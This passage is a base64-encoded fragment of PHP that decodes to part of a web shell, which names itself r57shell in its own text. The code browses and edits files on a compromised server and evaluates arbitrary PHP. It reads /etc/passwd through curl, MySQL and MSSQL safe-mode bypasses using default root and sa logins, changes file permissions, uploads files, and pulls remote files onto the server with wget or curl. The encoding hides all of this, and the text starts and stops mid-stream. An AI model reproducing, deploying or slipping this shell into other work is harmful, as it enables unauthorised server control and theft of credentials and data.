zYWZlX21vZGUgfHwgJF9QT1NUWydjbWQnXSE9InNhZmVfZGlyIil7ZWNobyAiPC90ZXh0YXJlYT4iO31lY2hvICI8L2Rpdj4iO2VjaG8gIjwvYj4iO2VjaG8gIjwvdGQ+PC90cj4iO2lmKCRzYWZlX21vZGUgJiYgJF9QT1NUWydjbWQnXT09InNhZmVfZGlyIiAmJiBpc3NldCgkYXJyRGlyc0FuZEZpbGVzKSl7ZWNobyAiPHRyPjx0ZD4iO3ByaW50ICI8Zm9ybSBtZXRob2Q9cG9zdCBuYW1lPW1mIHN0eWxlPSdkaXNwbGF5Om5vbmU7Jz4NCgkJPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9J2RpcicgdmFsdWU9JyIuJGRpci4iJz4NCgkJPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9J2NtZCcgdmFsdWU9Jyc+DQoJCTxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPSdwTmFtZScgdmFsdWU9Jyc+DQoJPC9mb3JtPiI7cHJpbnQgIjxzY3JpcHQ+DQoJCWZ1bmN0aW9uIGcoY21kLGRpcixwTmFtZSxwVmFsKSB7DQoJCQlpZihjbWQhPW51bGwpeyBkb2N1bWVudC5tZi5jbWQudmFsdWUgPSBjbWQ7IH0NCgkJCWlmKGRpciE9bnVsbCl7IGRvY3VtZW50Lm1mLmRpci52YWx1ZSA9IGRpcjsgfQ0KCQkJaWYocE5hbWUhPW51bGwpeyBkb2N1bWVudC5tZi5wTmFtZS5uYW1lID0gcE5hbWU7IH0NCgkJCWlmKHBOYW1lIT1udWxsICYmIHBWYWwhPW51bGwpeyBkb2N1bWVudC5tZi5wTmFtZS52YWx1ZSA9IHBWYWw7IH0NCgkJCWRvY3VtZW50Lm1mLnN1Ym1pdCgpOw0KCQl9DQoJPC9zY3JpcHQ+IjtwcmludCAiPHN0eWxlPiI7cHJpbnQgIi50YWJsZUxpc3Qge2ZvbnQtZmFtaWx5OlZlcmRhbmE7IGZvbnQtc2l6ZToxMXB4OyBiYWNrZ3JvdW5kLWNvbG9yOiNlNGU0ZTQ7IG1hcmdpbjoxMHB4OyBib3JkZXItY29sbGFwc2U6Y29sbGFwc2U7IH0iO3ByaW50ICIudGFibGVMaXN0IGEge3RleHQtZGVjb3JhdGlvbjpub25lOyBjb2xvcjojMDAwOyB9IjtwcmludCAiLnRhYmxlTGlzdCBhOmhvdmVyIHt0ZXh0LWRlY29yYXRpb246dW5kZXJsaW5lOyBjb2xvcjojMDAwOyB9IjtwcmludCAiLnRhYmxlTGlzdCB0ZCB7Ym9yZGVyOjFweCBzb2xpZCAjYTBhMGEwOyBwYWRkaW5nOjAgNXB4OyB9IjtwcmludCAiLnRhYmxlTGlzdCB0aCB7YmFja2dyb3VuZC1jb2xvcjojYTBhMGEwOyBib3JkZXI6MXB4IHNvbGlkICNjOGM4Yzg7IHRleHQtYWxpZ246Y2VudGVyOyB9IjtwcmludCAiLnRhYmxlTGlzdCB0cjpob3ZlciB7YmFja2dyb3VuZC1jb2xvcjojZmZmYmZiOyB9IjtwcmludCAiPC9zdHlsZT4iO3ByaW50ICI8Y2VudGVyPjx0YWJsZSB3aWR0aD0nNzAlJyBjZWxscGFkZGluZz0nMCcgY2VsbHNwYWNpbmc9JzAnIGJvcmRlcj0nMCcgY2xhc3M9J3RhYmxlTGlzdCc+PHRyPjx0aD5uYW1lPC90aD48dGg+c2l6ZTwvdGg+PHRoPmRhdGU8L3RoPjx0aD5wZXJtaXM8L3RoPjwvdHI+IjtwcmludCAiIjtmb3JlYWNoKCRhcnJEaXJzQW5kRmlsZXMgYXMgJGFyckRpcnNBbmRGaWxlc0tleT0+JGFyckRpcnNBbmRGaWxlc1ZhbCl7cHJpbnQgIjx0cj4iO2lmKCRhcnJEaXJzQW5kRmlsZXNWYWxbJ3R5cGUnXT09ImRpciIpe3ByaW50ICI8dGQ+PGEgaHJlZj0jIG9uY2xpY2s9XCJnKCdzYWZlX2RpcicsJyIuc3RyX3JlcGxhY2UoIlxcIiwiLyIsJGRpcikuIi8iLiRhcnJEaXJzQW5kRmlsZXNWYWxbJ25hbWUnXS4iJyxudWxsLG51bGwpXCI+PGI+Ii4kYXJyRGlyc0FuZEZpbGVzVmFsWyduYW1lJ10uIjwvYj48L2E+PC90ZD4iO31pZigkYXJyRGlyc0FuZEZpbGVzVmFsWyd0eXBlJ109PSJmaWxlIil7cHJpbnQgIjx0ZD48YSBocmVmPSMgb25jbGljaz1cImcoJ2VkaXRfZmlsZScsbnVsbCwnZV9uYW1lJywnIi5zdHJfcmVwbGFjZSgiXFwiLCIvIiwkZGlyKS4iLyIuJGFyckRpcnNBbmRGaWxlc1ZhbFsnbmFtZSddLiInKVwiPiIuJGFyckRpcnNBbmRGaWxlc1ZhbFsnbmFtZSddLiI8L2E+PC90ZD4iO31wcmludCAiPHRkPiIuc3RyX3JlcGxhY2UoYXJyYXkoIjwiLCI+IiksYXJyYXkoIiZsdDsiLCImZ3Q7IiksJGFyckRpcnNBbmRGaWxlc1ZhbFsnc2l6ZSddKS4iPC90ZD4iO3ByaW50ICI8dGQ+Ii4kYXJyRGlyc0FuZEZpbGVzVmFsWydkYXRlJ10uIjwvdGQ+IjtwcmludCAiPHRkPiIuJGFyckRpcnNBbmRGaWxlc1ZhbFsncGVybWlzJ10uIiZuYnNwOzwvdGQ+IjtwcmludCAiPC90cj4iO31wcmludCAiPC90YWJsZT48L2NlbnRlcj4iO2VjaG8gIjwvdGQ+PC90cj4iO31lY2hvICI8L3RhYmxlPiI7ZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wPiI7ZnVuY3Rpb24gdXBfZG93bigkaWQpe2dsb2JhbCAkbGFuZztnbG9iYWwgJGxhbmd1YWdlO3JldHVybiAiIjt9ZnVuY3Rpb24gZGl2KCRpZCl7aWYoaXNzZXQoJF9DT09LSUVbJGlkXSkgJiYgJF9DT09LSUVbJGlkXT09MCApcmV0dXJuICc8ZGl2IGlkPSInLiRpZC4nIiBzdHlsZT0iZGlzcGxheTogbm9uZTsiPic7cmV0dXJuICc8ZGl2IGlkPSInLiRpZC4nIj4nO31pZighJHNhZmVfbW9kZSl7ZWNobyAkZnMuJHRhYmxlX3VwMS4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0MiddLnVwX2Rvd24oJ2lkMScpLiR0YWJsZV91cDIuZGl2KCdpZDEnKS4kdHM7ZWNobyBzcigxNSAsIjxiPiIuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDMnXS4kYXJyb3cuIjwvYj4iLGluKCd0ZXh0JywnY21kJyw4NSAsJycpKTtlY2hvIHNyKDE1ICwiPGI+Ii4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NCddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCdkaXInLDg1ICwkZGlyKS53cyg0ICkuaW4oJ3N1Ym1pdCcsJ3N1Ym1pdCcsMCAsJGxhbmdbJGxhbmd1YWdlLidfYnV0dDEnXSkpO2VjaG8gJHRlLic8L2Rpdj4nLiR0YWJsZV9lbmQxLiRmZTt9ZWxzZSB7ZWNobyAkZnMuJHRhYmxlX3VwMS4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0MjgnXS51cF9kb3duKCdpZDInKS4kdGFibGVfdXAyLmRpdignaWQyJykuJHRzO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ0J10uJGFycm93LiI8L2I+IixpbigndGV4dCcsJ2RpcicsODUgLCRkaXIpLmluKCdoaWRkZW4nLCdjbWQnLDAgLCdzYWZlX2RpcicpLndzKDQgKS5pbignc3VibWl0Jywnc3VibWl0JywwICwkbGFuZ1skbGFuZ3VhZ2UuJ19idXR0NiddKSk7ZWNobyAkdGUuJzwvZGl2PicuJHRhYmxlX2VuZDEuJGZlO31lY2hvICRmcy4kdGFibGVfdXAxLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ0MiddLnVwX2Rvd24oJ2lkMycpLiR0YWJsZV91cDIuZGl2KCdpZDMnKS4kdHM7ZWNobyBzcigxNSAsIjxiPiIuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDQzJ10uJGFycm93LiI8L2I+IixpbigndGV4dCcsJ2VfbmFtZScsODUgLCRkaXIpLmluKCdoaWRkZW4nLCdjbWQnLDAgLCdlZGl0X2ZpbGUnKS5pbignaGlkZGVuJywnZGlyJywwICwkZGlyKS53cyg0ICkuaW4oJ3N1Ym1pdCcsJ3N1Ym1pdCcsMCAsJGxhbmdbJGxhbmd1YWdlLidfYnV0dDExJ10pKTtlY2hvICR0ZS4nPC9kaXY+Jy4kdGFibGVfZW5kMS4kZmU7aWYoJHNhZmVfbW9kZSl7ZWNobyAkZnMuJHRhYmxlX3VwMS4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NTcnXS51cF9kb3duKCdpZDQnKS4kdGFibGVfdXAyLmRpdignaWQ0JykuJHRzO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ1OCddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCdta19uYW1lJyw1NCAsKCFlbXB0eSgkX1BPU1RbJ21rX25hbWUnXSk/KCRfUE9TVFsnbWtfbmFtZSddKTooIm5ld19uYW1lIikpKS53cyg0ICkuIjxzZWxlY3QgbmFtZT1hY3Rpb24+PG9wdGlvbiB2YWx1ZT1jcmVhdGU+Ii4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NjUnXS4iPC9vcHRpb24+PG9wdGlvbiB2YWx1ZT1kZWxldGU+Ii4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NjYnXS4iPC9vcHRpb24+PC9zZWxlY3Q+Ii53cygzICkuIjxzZWxlY3QgbmFtZT13aGF0PjxvcHRpb24gdmFsdWU9ZmlsZT4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ1OSddLiI8L29wdGlvbj48b3B0aW9uIHZhbHVlPWRpcj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ2MCddLiI8L29wdGlvbj48L3NlbGVjdD4iLmluKCdoaWRkZW4nLCdjbWQnLDAgLCdtaycpLmluKCdoaWRkZW4nLCdkaXInLDAgLCRkaXIpLndzKDQgKS5pbignc3VibWl0Jywnc3VibWl0JywwICwkbGFuZ1skbGFuZ3VhZ2UuJ19idXR0MTMnXSkpO2VjaG8gJHRlLic8L2Rpdj4nLiR0YWJsZV9lbmQxLiRmZTt9aWYoJHNhZmVfbW9kZSAmJiAkdW5peCl7ZWNobyAkZnMuJHRhYmxlX3VwMS4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NjcnXS51cF9kb3duKCdpZDUnKS4kdGFibGVfdXAyLmRpdignaWQ1JykuJHRzO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ2OCddLiRhcnJvdy4iPC9iPiIsIjxzZWxlY3QgbmFtZT13aGF0PjxvcHRpb24gdmFsdWU9bW9kPkNITU9EPC9vcHRpb24+PG9wdGlvbiB2YWx1ZT1vd24+Q0hPV048L29wdGlvbj48b3B0aW9uIHZhbHVlPWdycD5DSEdSUDwvb3B0aW9uPjwvc2VsZWN0PiIud3MoMiApLiI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ2OSddLiRhcnJvdy4iPC9iPiIud3MoMiApLmluKCd0ZXh0JywncGFyYW0xJyw0MCAsKCgkX1BPU1RbJ3BhcmFtMSddKT8oJF9QT1NUWydwYXJhbTEnXSk6KCJmaWxlbmFtZSIpKSkud3MoMiApLiI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ3MCddLiRhcnJvdy4iPC9iPiIud3MoMiApLmluKCd0ZXh0JywncGFyYW0yIHRpdGxlPSInLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ3MSddLiciJywyNiAsKCgkX1BPU1RbJ3BhcmFtMiddKT8oJF9QT1NUWydwYXJhbTInXSk6KCIwNzc3IikpKS5pbignaGlkZGVuJywnY21kJywwICwnY2hfJykuaW4oJ2hpZGRlbicsJ2RpcicsMCAsJGRpcikud3MoNCApLmluKCdzdWJtaXQnLCdzdWJtaXQnLDAgLCRsYW5nWyRsYW5ndWFnZS4nX2J1dHQxJ10pKTtlY2hvICR0ZS4nPC9kaXY+Jy4kdGFibGVfZW5kMS4kZmU7fWlmKCEkc2FmZV9tb2RlKXtmb3JlYWNoKCRhbGlhc2VzIGFzICRhbGlhc19uYW1lPT4kYWxpYXNfY21kKXskYWxpYXNlczIuPSI8b3B0aW9uPiRhbGlhc19uYW1lPC9vcHRpb24+Ijt9ZWNobyAkZnMuJHRhYmxlX3VwMS4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NyddLnVwX2Rvd24oJ2lkNicpLiR0YWJsZV91cDIuZGl2KCdpZDYnKS4kdHM7ZWNobyBzcigxNSAsIjxiPiIud3MoOSApLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ4J10uJGFycm93LndzKDQgKS4iPC9iPiIsIjxzZWxlY3QgbmFtZT1hbGlhcz4iLiRhbGlhc2VzMi4iPC9zZWxlY3Q+Ii5pbignaGlkZGVuJywnZGlyJywwICwkZGlyKS53cyg0ICkuaW4oJ3N1Ym1pdCcsJ3N1Ym1pdCcsMCAsJGxhbmdbJGxhbmd1YWdlLidfYnV0dDEnXSkpO2VjaG8gJHRlLic8L2Rpdj4nLiR0YWJsZV9lbmQxLiRmZTt9ZWNobyAkZnMuJHRhYmxlX3VwMS4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NTQnXS51cF9kb3duKCdpZDcnKS4kdGFibGVfdXAyLmRpdignaWQ3JykuJHRzO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ1MiddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCdzX3RleHQnLDg1ICwndGV4dCcpLndzKDQgKS5pbignc3VibWl0Jywnc3VibWl0JywwICwkbGFuZ1skbGFuZ3VhZ2UuJ19idXR0MTInXSkpO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ1MyddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCdzX2RpcicsODUgLCRkaXIpLiIgKiAoIC9yb290Oy9ob21lOy90bXAgKSIpO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ1NSddLiRhcnJvdy4iPC9iPiIsaW4oJ2NoZWNrYm94JywnbSBpZD1tJywwICwnMScpLmluKCd0ZXh0Jywnc19tYXNrJyw4MiAsJy50eHQ7LnBocCcpLiIqICggLnR4dDsucGhwOy5odG0gKSIuaW4oJ2hpZGRlbicsJ2NtZCcsMCAsJ3NlYXJjaF90ZXh0JykuaW4oJ2hpZGRlbicsJ2RpcicsMCAsJGRpcikpO2VjaG8gJHRlLic8L2Rpdj4nLiR0YWJsZV9lbmQxLiRmZTtpZighJHNhZmVfbW9kZSAmJiAkdW5peCl7ZWNobyAkZnMuJHRhYmxlX3VwMS4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NzYnXS51cF9kb3duKCdpZDgnKS4kdGFibGVfdXAyLmRpdignaWQ4JykuJHRzO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ3MiddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCdzX3RleHQnLDg1ICwndGV4dCcpLndzKDQgKS5pbignc3VibWl0Jywnc3VibWl0JywwICwkbGFuZ1skbGFuZ3VhZ2UuJ19idXR0MTInXSkpO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ3MyddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCdzX2RpcicsODUgLCRkaXIpLiIgKiAoIC9yb290Oy9ob21lOy90bXAgKSIpO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ3NCddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCdzX21hc2snLDg1ICwnKi5baGNdJykud3MoMSApLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ3NSddLmluKCdoaWRkZW4nLCdjbWQnLDAgLCdmaW5kX3RleHQnKS5pbignaGlkZGVuJywnZGlyJywwICwkZGlyKSk7ZWNobyAkdGUuJzwvZGl2PicuJHRhYmxlX2VuZDEuJGZlO31lY2hvICRmcy4kdGFibGVfdXAxLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQzMiddLnVwX2Rvd24oJ2lkOScpLiR0YWJsZV91cDIuJGZvbnQ7ZWNobyAiPGRpdiBhbGlnbj1jZW50ZXI+Ii5kaXYoJ2lkOScpLiI8dGV4dGFyZWEgbmFtZT1waHBfZXZhbCBjb2xzPTEwMCByb3dzPTM+IjtlY2hvICghZW1wdHkoJF9QT1NUWydwaHBfZXZhbCddKT8oJF9QT1NUWydwaHBfZXZhbCddKTooIi8qIGRlbGV0ZSBzY3JpcHQgKi9cclxuLy91bmxpbmsoXCJyNTdzaGVsbC5waHBcIik7XHJcbi8vcmVhZGZpbGUoXCIvZXRjL3Bhc3N3ZFwiKTsiKSk7ZWNobyAiPC90ZXh0YXJlYT4iO2VjaG8gaW4oJ2hpZGRlbicsJ2RpcicsMCAsJGRpcikuaW4oJ2hpZGRlbicsJ2NtZCcsMCAsJ3BocF9ldmFsJyk7ZWNobyAiPGJyPiIud3MoMSApLmluKCdzdWJtaXQnLCdzdWJtaXQnLDAgLCRsYW5nWyRsYW5ndWFnZS4nX2J1dHQxJ10pO2VjaG8gIjwvZGl2PjwvZGl2PjwvZm9udD4iO2VjaG8gJHRhYmxlX2VuZDEuJGZlO2lmKCRzYWZlX21vZGUgJiYgJGN1cmxfb24pe2VjaG8gJGZzLiR0YWJsZV91cDEuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDMzJ10udXBfZG93bignaWQxMCcpLiR0YWJsZV91cDIuZGl2KCdpZDEwJykuJHRzO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQzMCddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCd0ZXN0MV9maWxlJyw4NSAsKCFlbXB0eSgkX1BPU1RbJ3Rlc3QxX2ZpbGUnXSk/KCRfUE9TVFsndGVzdDFfZmlsZSddKTooIi9ldGMvcGFzc3dkIikpKS5pbignaGlkZGVuJywnZGlyJywwICwkZGlyKS5pbignaGlkZGVuJywnY21kJywwICwndGVzdDEnKS53cyg0ICkuaW4oJ3N1Ym1pdCcsJ3N1Ym1pdCcsMCAsJGxhbmdbJGxhbmd1YWdlLidfYnV0dDgnXSkpO2VjaG8gJHRlLic8L2Rpdj4nLiR0YWJsZV9lbmQxLiRmZTt9aWYoJHNhZmVfbW9kZSl7ZWNobyAkZnMuJHRhYmxlX3VwMS4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0MzQnXS51cF9kb3duKCdpZDExJykuJHRhYmxlX3VwMi5kaXYoJ2lkMTEnKS4kdHM7ZWNobyAiPHRhYmxlIGNsYXNzPXRhYmxlMSB3aWR0aD0xMDAlIGFsaWduPWNlbnRlcj4iO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQzMCddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCd0ZXN0Ml9maWxlJyw4NSAsKCFlbXB0eSgkX1BPU1RbJ3Rlc3QyX2ZpbGUnXSk/KCRfUE9TVFsndGVzdDJfZmlsZSddKTooIi9ldGMvcGFzc3dkIikpKS5pbignaGlkZGVuJywnZGlyJywwICwkZGlyKS5pbignaGlkZGVuJywnY21kJywwICwndGVzdDInKS53cyg0ICkuaW4oJ3N1Ym1pdCcsJ3N1Ym1pdCcsMCAsJGxhbmdbJGxhbmd1YWdlLidfYnV0dDgnXSkpO2VjaG8gJHRlLic8L2Rpdj4nLiR0YWJsZV9lbmQxLiRmZTt9aWYoJHNhZmVfbW9kZSAmJiAkbXlzcWxfb24pe2VjaG8gJGZzLiR0YWJsZV91cDEuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDM1J10udXBfZG93bignaWQxMicpLiR0YWJsZV91cDIuZGl2KCdpZDEyJykuJHRzO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQzNiddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCd0ZXN0M19tZCcsMTUgLCghZW1wdHkoJF9QT1NUWyd0ZXN0M19tZCddKT8oJF9QT1NUWyd0ZXN0M19tZCddKTooIm15c3FsIikpKS53cyg0ICkuIjxiPiIuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDM3J10uJGFycm93LiI8L2I+Ii5pbigndGV4dCcsJ3Rlc3QzX21sJywxNSAsKCFlbXB0eSgkX1BPU1RbJ3Rlc3QzX21sJ10pPygkX1BPU1RbJ3Rlc3QzX21sJ10pOigicm9vdCIpKSkud3MoNCApLiI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQzOCddLiRhcnJvdy4iPC9iPiIuaW4oJ3RleHQnLCd0ZXN0M19tcCcsMTUgLCghZW1wdHkoJF9QT1NUWyd0ZXN0M19tcCddKT8oJF9QT1NUWyd0ZXN0M19tcCddKTooInBhc3N3b3JkIikpKS53cyg0ICkuIjxiPiIuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDE0J10uJGFycm93LiI8L2I+Ii5pbigndGV4dCcsJ3Rlc3QzX3BvcnQnLDE1ICwoIWVtcHR5KCRfUE9TVFsndGVzdDNfcG9ydCddKT8oJF9QT1NUWyd0ZXN0M19wb3J0J10pOigiMzMwNiIpKSkpO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQzMCddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCd0ZXN0M19maWxlJyw5NiAsKCFlbXB0eSgkX1BPU1RbJ3Rlc3QzX2ZpbGUnXSk/KCRfUE9TVFsndGVzdDNfZmlsZSddKTooIi9ldGMvcGFzc3dkIikpKS5pbignaGlkZGVuJywnZGlyJywwICwkZGlyKS5pbignaGlkZGVuJywnY21kJywwICwndGVzdDMnKS53cyg0ICkuaW4oJ3N1Ym1pdCcsJ3N1Ym1pdCcsMCAsJGxhbmdbJGxhbmd1YWdlLidfYnV0dDgnXSkpO2VjaG8gJHRlLic8L2Rpdj4nLiR0YWJsZV9lbmQxLiRmZTt9aWYoJHNhZmVfbW9kZSAmJiAkbXNzcWxfb24pe2VjaG8gJGZzLiR0YWJsZV91cDEuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDg1J10udXBfZG93bignaWQxMycpLiR0YWJsZV91cDIuZGl2KCdpZDEzJykuJHRzO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQzNiddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCd0ZXN0NF9tZCcsMTUgLCghZW1wdHkoJF9QT1NUWyd0ZXN0NF9tZCddKT8oJF9QT1NUWyd0ZXN0NF9tZCddKTooIm1hc3RlciIpKSkud3MoNCApLiI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQzNyddLiRhcnJvdy4iPC9iPiIuaW4oJ3RleHQnLCd0ZXN0NF9tbCcsMTUgLCghZW1wdHkoJF9QT1NUWyd0ZXN0NF9tbCddKT8oJF9QT1NUWyd0ZXN0NF9tbCddKTooInNhIikpKS53cyg0ICkuIjxiPiIuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDM4J10uJGFycm93LiI8L2I+Ii5pbigndGV4dCcsJ3Rlc3Q0X21wJywxNSAsKCFlbXB0eSgkX1BPU1RbJ3Rlc3Q0X21wJ10pPygkX1BPU1RbJ3Rlc3Q0X21wJ10pOigicGFzc3dvcmQiKSkpLndzKDQgKS4iPGI+Ii4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0MTQnXS4kYXJyb3cuIjwvYj4iLmluKCd0ZXh0JywndGVzdDRfcG9ydCcsMTUgLCghZW1wdHkoJF9QT1NUWyd0ZXN0NF9wb3J0J10pPygkX1BPU1RbJ3Rlc3Q0X3BvcnQnXSk6KCIxNDMzIikpKSk7ZWNobyBzcigxNSAsIjxiPiIuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDMnXS4kYXJyb3cuIjwvYj4iLGluKCd0ZXh0JywndGVzdDRfZmlsZScsOTYgLCghZW1wdHkoJF9QT1NUWyd0ZXN0NF9maWxlJ10pPygkX1BPU1RbJ3Rlc3Q0X2ZpbGUnXSk6KCJkaXIiKSkpLmluKCdoaWRkZW4nLCdkaXInLDAgLCRkaXIpLmluKCdoaWRkZW4nLCdjbWQnLDAgLCd0ZXN0NCcpLndzKDQgKS5pbignc3VibWl0Jywnc3VibWl0JywwICwkbGFuZ1skbGFuZ3VhZ2UuJ19idXR0OCddKSk7ZWNobyAkdGUuJzwvZGl2PicuJHRhYmxlX2VuZDEuJGZlO31pZihAaW5pX2dldCgnZmlsZV91cGxvYWRzJykpe2VjaG8gIjxmb3JtIG5hbWU9dXBsb2FkIG1ldGhvZD1QT1NUIEVOQ1RZUEU9bXVsdGlwYXJ0L2Zvcm0tZGF0YT4iO2VjaG8gJHRhYmxlX3VwMS4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NSddLnVwX2Rvd24oJ2lkMTQnKS4kdGFibGVfdXAyLmRpdignaWQxNCcpLiR0cztlY2hvIHNyKDE1ICwiPGI+Ii4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NiddLiRhcnJvdy4iPC9iPiIsaW4oJ2ZpbGUnLCd1c2VyZmlsZScsODUgLCcnKSk7ZWNobyBzcigxNSAsIjxiPiIuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDIxJ10uJGFycm93LiI8L2I+IixpbignY2hlY2tib3gnLCduZjEgaWQ9bmYxJywwICwnMScpLmluKCd0ZXh0JywnbmV3X25hbWUnLDgyICwnJykuaW4oJ2hpZGRlbicsJ2RpcicsMCAsJGRpcikud3MoNCApLmluKCdzdWJtaXQnLCdzdWJtaXQnLDAgLCRsYW5nWyRsYW5ndWFnZS4nX2J1dHQyJ10pKTtlY2hvICR0ZS4nPC9kaXY+Jy4kdGFibGVfZW5kMS4kZmU7fWlmKCEkc2FmZV9tb2RlICYmICEkd2luZG93cyl7ZWNobyAkZnMuJHRhYmxlX3VwMS4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0MTUnXS51cF9kb3duKCdpZDE1JykuJHRhYmxlX3VwMi5kaXYoJ2lkMTUnKS4kdHM7ZWNobyBzcigxNSAsIjxiPiIuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDE2J10uJGFycm93LiI8L2I+IiwiPHNlbGVjdCBzaXplPVwiMVwiIG5hbWU9XCJ3aXRoXCI+PG9wdGlvbiB2YWx1ZT1cIndnZXRcIj53Z2V0PC9vcHRpb24+PG9wdGlvbiB2YWx1ZT1cImZldGNoXCI+ZmV0Y2g8L29wdGlvbj48b3B0aW9uIHZhbHVlPVwibHlueFwiPmx5bng8L29wdGlvbj48b3B0aW9uIHZhbHVlPVwibGlua3NcIj5saW5rczwvb3B0aW9uPjxvcHRpb24gdmFsdWU9XCJjdXJsXCI+Y3VybDwvb3B0aW9uPjxvcHRpb24gdmFsdWU9XCJHRVRcIj5HRVQ8L29wdGlvbj48L3NlbGVjdD4iLmluKCdoaWRkZW4nLCdkaXInLDAgLCRkaXIpLndzKDIgKS4iPGI+Ii4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0MTcnXS4kYXJyb3cuIjwvYj4iLmluKCd0ZXh0JywncmVtX2ZpbGUnLDc4ICwnaHR0cDovLycpKTtlY2hvIHNyKDE1ICwiPGI+Ii4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0MTgnXS4kYXJyb3cuIjwvYj4iLGluKCd0ZXh0JywnbG9jX2ZpbGUnLDEwNSAsJGRpcikud3MoNCApLmluKCdzdWJtaXQnLCdzdWJtaXQnLDAgLCRsYW5nWyRsYW5ndWFnZS4nX2J1dHQyJ10pKTtlY2hvICR0ZS4nPC9kaXY+Jy4kdGFibGVfZW5kMS4kZmU7fWVjaG8gJGZzLiR0YWJsZV91cDEuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDg2J10udXBfZG93bignaWQxNicpLiR0YWJsZV91cDIuZGl2KCdpZDE2JykuJHRzO2VjaG8gc3IoMTUgLCI8Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ1OSddLiRhcnJvdy4iPC9iPiIsaW4oJ3RleHQnLCdkX25hbWUnLDg1ICwkZGlyKS5pbignaGlkZGVuJywnY21kJywwICwnZG93bmxvYWRfZmlsZScpLmluKCdoaWRkZW4nLCdkaXInLDAgLCRkaXIpLndzKDQgKS5pbignc3VibWl0Jywnc3VibWl0JywwICwkbGFuZ1skbGFuZ3VhZ2UuJ19idXR0MTQnXSkpOyRhcmg9JGxhbmdbJGxhbmd1YWdlLidfdGV4dDkyJ107aWYoQGZ1bmN0aW9uX2V4aXN0cygnZ3pjb21wcmVzcycpKXskYXJoLj1pbigncmFkaW8nLCdjb21wcmVzcycsMCAsJ3ppcCcpLicgemlwJzt9aWYoQGZ1bmN0aW9uX2V4aXN0cygnZ3plbmNvZGUnKSl7JGFyaC49aW4oJ3JhZGlvJywnY29tcHJlc3MnLDAgLC